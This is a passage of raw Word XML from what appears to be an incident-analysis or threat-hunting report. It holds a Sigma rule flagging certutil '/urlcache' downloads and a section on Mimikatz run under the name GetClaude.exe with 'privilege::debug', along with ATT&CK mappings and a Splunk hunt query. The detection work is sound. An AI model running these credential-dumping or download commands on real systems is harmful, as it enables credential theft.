                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>logsource:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BA05C54">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="684384AA">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:ind w:firstLine="300" w:firstLineChars="150"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>category: process_creation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="384F056B">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:ind w:firstLine="300" w:firstLineChars="150"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>product: windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12C0C730">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3CA2FC04">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>detection:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="495574BE">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:ind w:firstLine="300" w:firstLineChars="150"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>selection_image:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FE567DD">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:ind w:firstLine="700" w:firstLineChars="350"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Image|endswith: '\certutil.exe'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6090B12A">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="60E9DEC6">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>selection_command:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F54B022">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:ind w:firstLine="600" w:firstLineChars="300"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CommandLine|contains: '/urlcache'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00BB3A83">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:ind w:firstLine="600" w:firstLineChars="300"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>condition: all of selection_*</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D2373F6">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="02DF1C81">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>level: high</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03A52AFC">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="72DF6D73">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>tags:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A75A9E1">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="529B12F0">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:ind w:firstLine="600" w:firstLineChars="300"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>attack.command_and_control</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7760EFC8">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:ind w:firstLine="600" w:firstLineChars="300"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>attack.t1105</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5C601F2A"/>
    <w:p w14:paraId="3D1C934F"/>
    <w:p w14:paraId="28526736"/>
    <w:p w14:paraId="44CD2A34"/>
    <w:p w14:paraId="3CEB2CB2">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F32B624">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>12 / CREDENTIAL ACCESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBFE961">
      <w:pPr>
        <w:pStyle w:val="40"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 7 — Mimikatz and Credential-Access Preparation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362192D6">
      <w:pPr>
        <w:pStyle w:val="36"/>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next phase shows the execution of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GetClaude.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, which identified itself as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Mimikatz 2.2.0 x64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. The operator first entered </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>privilege :: debug</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, which failed because of incorrect syntax, and then executed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>privilege::debug</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, which returned </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Privilege 20 OK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. This confirms successful debug-privilege enablement within Mimikatz and indicates preparation for privileged process access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A4E0FD">
      <w:pPr>
        <w:pStyle w:val="36"/>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observed activity supports </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>T1003 — OS Credential Dumping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> at the tool-usage level, but the supplied evidence does not establish that credentials were actually extracted. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>T1003.001 — LSASS Memory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> should therefore remain conditional until telemetry shows Mimikatz or another process accessing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lsass.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, such as through </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Sysmon Event ID 10 — Process Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, or until a confirmed credential-dumping command or artifact is observed. The Mimikatz process should be correlated with its parent process, user context, hash, and any subsequent LSASS access events.</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2537"/>
        <w:gridCol w:w="2537"/>
        <w:gridCol w:w="2537"/>
      </w:tblGrid>
      <w:tr w14:paraId="48FA0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shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6D340CB4">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p>
          <w:p w14:paraId="06C63503">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Action</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AC16153">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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3FE6B760">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ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="548986E7">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Sysmon Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0D335670">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Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="774EA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2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="208E3625">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Execute Mimikatz (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>GetClaude.exe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="37"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="710BA88E">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T1003 — OS Credential Dumping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6BDC96F3">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Sysmon Event ID 1 — Process Create</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="58742A2F">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Execute Mimikatz (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>GetClaude.exe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="37"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2219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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1141667C">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LSASS access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="79DE6E7C">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T1003.001 — LSASS Memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="36866DE0">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Sysmon Event ID 10 — Process Access</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> targeting </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>lsass.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3866E9EE">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LSASS access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="58FF1253">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EBA28E0">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Splunk: Mimikatz / privilege::debug Hunt</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="12"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="123" w:type="dxa"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10025"/>
      </w:tblGrid>
      <w:tr w14:paraId="730775BF">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10025" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="203A5B" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="203A5B" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="203A5B" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="203A5B" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
          </w:tcPr>
          <w:p w14:paraId="36CB9CBE">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index=_internal host="Sh-Win10" EventCode=1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6169687F">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>| search Image="*\\GetClaude.exe" OR Image="*\\mimikatz.exe" OR CommandLine="*privilege*"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45345C3B">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>| table _time host User ParentImage Image CommandLine ProcessGuid ProcessId IntegrityLevel SHA256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4264F40D">
      <w:pPr>
        <w:pStyle w:val="170"/>
        <w:spacing w:after="40"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E6A2A42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
